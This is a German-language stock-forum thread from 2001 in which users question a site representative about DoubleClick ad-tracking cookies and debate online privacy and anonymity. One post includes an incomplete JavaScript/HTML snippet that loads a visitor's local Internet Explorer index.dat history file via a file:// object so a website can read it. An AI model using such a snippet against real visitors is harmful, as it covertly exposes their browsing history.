JP__ARIVA__FRAGE!!!!!!!!!!!!

Zugriffe: 1.709 / Heute: 2
Technology All S. 3.856,68 -0,40% Perf. seit Threadbeginn:   +114,14%

Elan:

JP__ARIVA__FRAGE!!!!!!!!!!!!

21.04.01 14:48
Hallo JP,

drei Fragen hätte ich, um deren Beantwortung ich Dich gerne fragen möchte.
Beim surfen auf Eurer Seite werden Informationen an doubleclick.com weitergegeben.
1. Warum macht Ihr das?
2. Was genau gebt Ihr weiter, welches Profil lässt Ihr anfertigen?
3. Was bringt Euch das?

Als 4.tes wäre noch zu fragen: Sollte nicht irgendwo anstandshalber ein Hinweis sein, dass Infos an Dritte weitergegeben werden???

Elan wartet auf eine Antwort.

Danke im voraus.

Gruss

coppara:

@Elan, ich frage nicht

22.04.01 19:35
wie Du draufgekommen bist, interessant find' ich's auf jeden Fall.

MfG:-)
coppara

josua1123:

Joshua wartet auch auf Antwort

22.04.01 19:42
An Dritte weitergegeben???
Keine kleine Angelegenheit.

jo.
fosca:

Antwort

22.04.01 20:53
Elan, ein paar Ausrufungszeichen weniger wuerden es auch tun :)
1.) Erst einmal ist die Behauptung so nicht richtig. Die Informationen werden nicht weiter gegeben, sondern
   Du wirst aud deren Seite umgeleitet, damit Doubleclick bei Dir ein Cookie setzen kann.
   Warum so umstaendlich? Ganz einfach, nicht der Server liest die in einem Cookie gespeicherten
   Informationen, sondern der Client uebersendet sie, allerdings nur an den URL,
   der das Cookie auch gesetzt hat. Um die Motivation zu verstehen, die dahinter steckt, solltest Du Dich einfach mal
   auf den Seiten von Doubleclick umsehen. Doubleclick liefert Marktinformationen ueber
   die Nutzer im Internet. Dazu erstellt Doubleclick ein Profil von Dir.
   Zur Identifizierung Deiner Person dienen die Cookies. Ariva allein bringt
   Doubleclick da noch nicht viel weiter. Allerdings arbeiten viele Seiten mit
   Doubleklick zusammen. Du wirst also sehr oft ohne es zu wissen auf den
    Server von Doubleclick geleitet. So entsteht eine perfekte Verfolgung.
fosca:

Antwort

22.04.01 21:01
2) Ariva ist nun ein Kunde von Doubleclick. Sie moechten mehr ueber Ihre Besucher erfahren und leiten Dich aus diesem Grund nicht nur an Doubleclick um, sondern liefern auch noch weitere Daten ueber den Kunden an Doubleclick. Informationen, die beispielsweise im Header Deines Clients uebertragen werden, welche Dinge Du besonders oft suchst usw.. Im Gegenzug erhaelt Ariva ein immer besseres Profil von Dir, durch Doubleclick.
Genutzt werden die Profile meist, um Dir geziet auf Dich zugeschnittene Werbung zu praesentieren.
Ich denke, damit sind Deine Fragen beantwortet.
fosca:

Antwort

22.04.01 21:05
Entschuldigt die schlechte Formatierung. Ich bin mit Lynx im Netz unterwegs, da passt das manchmal nicht so schoen mit dem Zeilenumbruch. Werde mich bessern, versprochen ;)
Arbeiter:

Das ist ja richtig spannend.

22.04.01 21:14
Dann brauch ich demnächst nicht mehr auf Playboys Seiten surfen.
Ich bekomme den dann als Werbung zugeschickt.
Super spart Geld. :-)
DarkKnight:

Welcher Sterneverballerer ist gerade aufgewacht?

22.04.01 21:19
PS: seit wann kostet surfen Geld?
JP:

Bannersoftware

23.04.01 10:01
Hallo Elan,

Doubleclick Dart ist die am stärksten verbreitetste Bannersoftware weltweit. Auf diesen Standard setzt auch unsere Vermarktungsagentur und daher auch wir. Die Software ist auf unseren Seiten so eingebunden wie auf fast allen anderen Seiten mit Doubleclick auch. Profile werden, wenn überhaupt, nur von Doubleclick angelegt. Um zu erfahren, was da genau geschieht, schau bitte unter www.doubleclick.de.

Elan:

JP

23.04.01 15:39
Danke für die Antwort, doch zufrieden stellt mich das nicht. Doubleclick erstellt womöglich Profile von mir und allen anderen Usern Eurer Seite, und Du willst nicht wissen was damit geschieht?
Werbung ist für Dich nachvollziehbar wichtig, dafür auch mein Verständnis, aber muss es denn sein, dass ich mit meine PC im Netz gläsern bin? Im Grunde unterstützt Ihr die Gläsernheit durch Eurem Handeln. Schlimm finde ich dazu, dass Du konkret nicht weisst was mit den Infos gemacht wird und wer noch alles davon erfährt. Deine Seite könnte doch auch so konfiguriert werden, dass keine Cookies notwendig sind...Dass Doubleclick der weitverbreiteste Anbieter ist, ist doch noch lange keine Rechtfertigung dafür, dass Dritte Infos über mich durch Euch an Dritte weitergeleitet werden, oder zumindest dass Dritte profiltechnisch mein poersönliches Surfverhalten studieren können. Ich bin somit nicht mehr frei...Findet Ihr das bei Ariva anders, etwa richtig?

Elan grüßt
JP:

Doubleclick

23.04.01 16:53
Genaue Infos zu den Profilen findest Du unter: www.doubleclick.net/us/corporate/privacy/

Da die gespeicherten Profile nicht persönlich zuordbar sind und nur zur Optimierung des Bannerauswahl verwendet werden, ist dieses Verfahren m.E. in Ordnung.

Bronco:

Das finde ich keineswegs ! Mir ist zwar klar, daß

23.04.01 17:05
Ihr das tut - bin schließlich kein Traumtänzer. Dennoch ist das so nicht in Ordnung. Datenschutz hat Verfassungsrang. Wichtigstes Grundprinzip ist dabei, daß der Einzelne in Kenntnis gesetzt wird, wo seine Daten in welchem Umfang landen (egal ob mit "Kopf" oder nur "anonymisiert"), um selbst über das Risiko von Datenmißbrauch befinden und diesem vorbeugen zu können. Wenn Euch nicht klar wäre, daß das ein durchaus sensibles Thema ist, das für viele auch ein Entscheidungskriterium darstellt, ob sie mit Euch zu tun haben wollen oder nicht, so hättet Ihr ja wohl keine Probleme, im Registrierungsteil umfassend darauf aufmerksam zu machen. - Das wäre jedenfalls die faire Version !

Gruß

Bronco
bingos:

AD aware

23.04.01 17:08
Dieses Programm entfernt die Doubleclick-Cookies und andere "Spyware-references" ("Werbe-Trojaner).

Hier kann man es kostenlos herunterladen:

www.lavasoft.de/aaw/index.html
sunshine:

Nur kein Stress, warum...

23.04.01 17:13
... löscht Ihr nicht einfach die Werbe-Cookies?
Man kann doch in vielen Browsern sogar einstellen, von wem man Cookies annehmen möchte und von wem nicht.
Wenn das Cookie weg ist, ist auch die ID weg. Und ohne ID kein Profil...

Grüße, sunshine
sunshine:

@Bronco

23.04.01 17:21
Soweit ich JP verstanden habe, gibt ARIVA selbst keine Daten weiter.
Wieso sollten sie also auf ein ganz normales Vorgehen im Web aufmerksam machen? Dann müssten wir auch in jeder Kneipe vom Wirt vor den Schäden des Passiv-Rauchens gewarnt werden!
Die ID-Cookies gelten ständig und überall, nicht nur bei ARIVA. Wenn Du AMAZON aufrufst, dann wird auch das bei DoubleClick bemerkt und Deiner ID zugeordnet.

sunshine
mr.andersson:

wo habt ihr eigentlich euren namen hinterlegt ?

23.04.01 19:53

also gläserner mr.andersson hin, gläserner mr.andersson her.
niemand hier weiß, wer hinter der id steht ( zumindest kennt keiner den namen des realen nutzers hinter mr.andersson) und doubleclick schon gleich gar nicht.
da können die profile über mr.andersson anlegen bis die schwarz werden.da ich die id sonst nirgends benutze , sind meine persönlichen surfgewohnheiten bestens geschützt .

und zum thema verfassungsrang des datenschutzes bronco :

in der verfassung steht kein einziges wort darüber, das die daten von virtuellen id irgenwie geschützt sind. deine daten wären erst dann vom datenschutzgesetz geschützt, wenn eindeutig klar wäre, welche reale person sich hinter der id bronco verbirgt.deine virtuelle id selbst hat keinerlei recht welcher art auch immer.

dieses thema mit den werbecookies hatten wir doch schon ein paar mal . wer da angst hat, dem empfehle ich einfach die cookies zu deaktivieren. dann zum posten anschalten und nach dem posting die cookies löschen. dann cookies wieder aus.
man kann auch einfach anschalten , dass man vor den setzen eines cookies jedesmal gefragt wird. dann kann man direkt von fall zu fall entscheiden.

in diesem sinne
fosca:

mr.andersson

23.04.01 20:36
Das ist so nicht richtig. Es wird ja keine ID mr.andersson gespeichert.
Du wirst auf den Server von Doubleclick umgeleitet. Die setzen Dir dann
ein Cookie. Beim naechsten Link auf Doubleclick (fuer Dich unbemerkt)
Gibt Dein Browser alle Cookies an den Server von Doubleclick zurueck.
Also kennt Doubleclick Deine Surfgewohnheiten besser, als Du das wah haben moechtest.
Die Person hinter mr.andersson herauszufinden ist auch nicht so sonderlich schwer.
Und Cookies deaktivieren" loesen zwar das "Doubleclick-Problem" liefern Dir jedoch keine Anonymitaet. Dein Client uebergibt dem jeweiligen Server  jede Menge Informationen im Header. Manch Client uebergibt sogar die E-Mail-Adresse. Nun stell Dir mal vor, die Betreiber bekannter Server wuerden Informationen austauschen.
Ein Ausweg waere das Surfen ueber einen anonymen Proxy. Die Frage ist nur, kannst Du den Betreibern von diesem Proxy trauen?
Alle anderen Moeglichkeiten des anonymen surfens sind nicht gerade legal.
Im uebrigen sind Cookies gar keine schlechte Sache. Leider werden sie durch Firmen wie Doubleclick und ihre Kunden zweckentfremdet.
mr.andersson:

hi fosca

23.04.01 20:53

das mit dem speichern der id mr.anderson ist ja schon das "worst case" szenario. ohne diese information und ohne meinen namen ist das profil doch noch "wertloser". natürlich bleiben die daten für den werbetreibenden weiterhin relevant.

die person hinter mr.andersson rauszufinden ist in meinem fall sogar aussgesprochen einfach, aber ich denke halt nicht, das doubleclick das versucht. sollten die das machen und sich dabei erwischen lassen , bin ich derselben meinung wie bronco und komme denen ganz schnell mit datenschutz und verfassung. was ich damit erreichen könnte sei mal dahingestellt.

das anonynimität im netz eigentlich eine illusion ist, ist mir bewusst. ich habe auch nicht das stärkste bedürfniss danach.
das es keine wirkliche anonymität geben kann,ist schon alleine dadurch klar, das ja die von mir angeforderten seiten auf meinem bildschirm sichtbar werden. also weiß derjenige, der die seiten zur verfügung stellt wohl auch, wo die seiten hingehen.

ich habe mal irgendwo gelesen , dass die meißten "anonymisierer" direkt von amerikanischen regierungsdiensten betrieben werden. ob das stimmt, weiß ich allerdings nicht.

wenn ich wirklich ums verrecken anonym sein wollte, dann würde ich in eine statt in der nähe fahren und mich dort in ein internetcafe setzen . das ist anonym zum quadrat und sicherlich legal.

ich persönlich betreibe allerdings keinen grossen aufwand um anonym zu bleiben. mir ist datensicherheit, hackerschutz und vierenschutz wichtiger. auch wenn mich ein vollprofie trozdem mit haut und haaren auffressen würde , werde ich meine schutzwälle nicht höher fahren, da der aufwand den nutzen übersteigt.

ni diesem sinne
whirl:

persönliche zuordnung der cookies doch möglich ;-(

23.04.01 21:16
wer glaubt er wäre hier anonym unterwegs, der glaubt auch das ein zitronenfalter zitronen faltet.

wer denkt er könne ohne cookies surfen, sie bei ariva oder wo auch immer einschalten, dann wieder ausschalten und dann die cookies löschen  u n d  meint dann wäre alles gut, irrt.

punkt 1: ihre könnt ja mal eure cookies löschen. dann schaut mal in euren cookie-ordner. dort ist eine datei index.dat. wenn ihr die mit einem texteditor (notepad) öffnet ...

seht ihr da einen zitronenfalter ;-).

die index.dat lässt sich nicht so einfach löschen, höchstens editieren.

punkt 2: dass eure postings bei ariva (mit ip und benutzerdaten) mitgeloggt werden, dürfte wohl jedem hier klar sein.
dass sich fast jede ip personell zuordnen lässt wohl auch.

punkt 3: wenn jemand ein cookie bei euch ablegt, kennt er auch eure ip, sonst gänge es ja wohl schlecht.
das ist aber erst einmal nichts besonderes (man kann die ip auch schön regional zuordnen).
das problem ist, dass die cookies auch ausgelesen werden können (sonst würden sie nicht abgelegt werden). das ist dann schon etwas besonderes, denn in eurem cookie-ordner ist nicht nur der ariva-keks sondern auch der von XXX, XXX und XXX (kekse, kekse, kekse) und die index.dat.

die mangelnde sandboxfunktionalität des ms internet explorers wurde schon mehrfach beklagt, aber er ist nun mal der referenzbrowser mit dem 90 % der surfer unterwegs sind.

punkt 4: doubleclick wird sich sicher nicht bemühen, die identität der ip soundso zu ermitteln (hätten sie ja mächtig viel zu tun) aber:

wenn heutzutage ein betriebssysten installiert wird, dann werden die benutzerdaten bei der installation abgefragt (name, adresse etc.).

ob das jemand auch angibt oder nicht ist wieder ein anderes thema.
benötigt jemand doch echten support, der ja im hohen preis enthalten ist wäre es doch ganz hilfreich sich registrieren zu lassen, sonst ist´s u.u. schlecht mit support. (windowsupdate ist nur mit registrierung möglich, es sei denn man setzt den wert in der registry selbst ;-\).

und wenn frau meier (ihres zeichens nicht so ein softwareexperte wie z.b. fosca, der sich hier mit linux abquält)  bei der windows me installation nach name und adresse gefragt wird, dann gibt sie die auch ein. punkt.

dann loggt sie beim systemstart noch mit "frau meier" ein (bei dem namen wahrscheinlich nicht so tragisch), und schon heisst das cookie "frau meier@doubleclick[1].txt".

mmh

nebenbei liest doubleclick noch die cookies "frau meier@perverse-spiele[1].txt", "frau meier@transi-for-you[1].txt" und "frau meier@anonyme-alkoholiker-und-schuldnerberatung[1].txt" aus.

mmh

aber was solls.

wenn ich hier über die strasse gehe sieht´s auch jeder.
wenn ich pech habe schaut frau meier von gegenüber sogar bei mir durch´s fenster und sieht wie ich gerade telefoniere ;-v.

was solls.

bye
whirl
fosca:

:)

23.04.01 21:42
Hallo Whirl,

wenn mir die Sterne nicht schexx egal waeren, wuerde ich jetzt schreiben,
Du hast einen gruenen Stern
verdient.
Frau Meier scheint aber ein ziemliches Ferkel zu sein *lol*
whirl:

hi fosca

23.04.01 21:48
kannste aber wissen :-))
josua1123:

001110010101110000101000

23.04.01 22:03
00010100011110000101
Wer weis was es heißt,und wo geht es hin??
Solange die Auswertung teurer ist als der Informationsgehalt
sind wir sicher.
Glaubts.

jo.

fosca:

Das tollste ist,

23.04.01 22:12
dass amn die Index.dat leicht auslesen kann. Kann jeder auf seiner Domain oder Homepage um nachzuvollziehen, wo seine Besucher sonst noch so rumgurken.
Fuer IE5 waere dazu lediglich folgende Seite notwedig

<SCRIPT>
b=window.open("...);a.document.body.innerHTML=escape(document.body.innerHTML)");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=400 HEIGHT=400> </OBJECT>';
//s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=400 HEIGHT=400>';
// ^^^ This is for Win2K ------------you must change "Administrator" to the actual user name
setTimeout("document.writeln(s)",5000);
</SCRIPT>
whirl:

@josua: nicht mir word öffnen ;-)

23.04.01 22:23
die auswertung ist nicht teuer.

es gibt überall rechner mit reichlich kapazität, die 24h am tag nichts anderes machen als das auszuwerten.

sind doch wichtige wertvolle daten für einen markt.
Du Dummer Du:

Wer im Internet herumtobt, muß

23.04.01 23:20
immer damit rechnen, daß die Daten weitergegeben werden. Im übrigen habe ich einen ausländischen Freund, der sich einen Spaß daraus macht, Seiten, wie z.B. die vom JP (also Ariva oder ä.) anzuzapfen. Ich wollte es nicht glauben. Da mailte er, seht Euch mal die Seite X an, da habe ich rechts unten Hallo reingestellt. Werde es aber gleich wieder beseitigen. So leicht ist das, liebe Arivaner. Also, was ihr hier schreibt, kann jeder, der Eins und Eins und ein bißchen mehr zusammenzählen kann, lesen!!!! Warum denn auch nicht?
Du Dummer Du:

Im übrigen ist das auch der einzigste Grund, warum

23.04.01 23:24
ich nicht Online-Banking mache, der würde mir, wenn auch nur vorübergehend einmal aus Spaß, das Konto glattweg plündern.  
Du Dummer Du:

Aber ich denke, das ist auch jemand, der ein biß-

23.04.01 23:27
chen mehr weiß, als daß 1 + 1 2 ist. Er macht das auch mit Vor- und Rückwärtsgang, auch unter Wasser.
Du Dummer Du:

Bescheidene Frage: ... gibt es JP

23.04.01 23:31
bei Ariva überhaupt noch? Oder haben die grünen Punkterichter es schon geeschafft, ihn in den dauerhaften "Zwangsurlaub" zu bringen. Denn auf diee Fragen an dieser Stelle antwortet er nicht mehr oder antwortete zumindest noch nicht. Vielleicht ist er auch so weit nach oben gestiegen, daß ihm bisher die Zeit dazu fehlte. Fazit: Die Arbeit richtig an die Untergebenen verteilen, lieber JP!
Es gibt keine neuen Beiträge.

Börsen-Forum - Gesamtforum - Antwort einfügen - zum ersten Beitrag springen

Neueste Beiträge aus dem Technology All Share (Performance) Forum

Wertung Antworten Thema Verfasser letzter Verfasser letzter Beitrag
11 1.118 USU Software --- Cashwert fast auf ATL -- Lalapo MrTrillion3 01.12.24 18:01
11 523 Elmos Semiconductor Jorgos Highländer49 08.11.24 18:23
  19 Bitte an Ariva Spitfire33 taos 28.09.24 11:26
  68 Comroad Kursziel 5 Euro in 3 Monaten! BWLer KevinRoberts 19.09.24 12:03
  14 Hallo Agilent-Aktionäre Anke Mankanke cfgi 21.08.24 22:29

--button_text--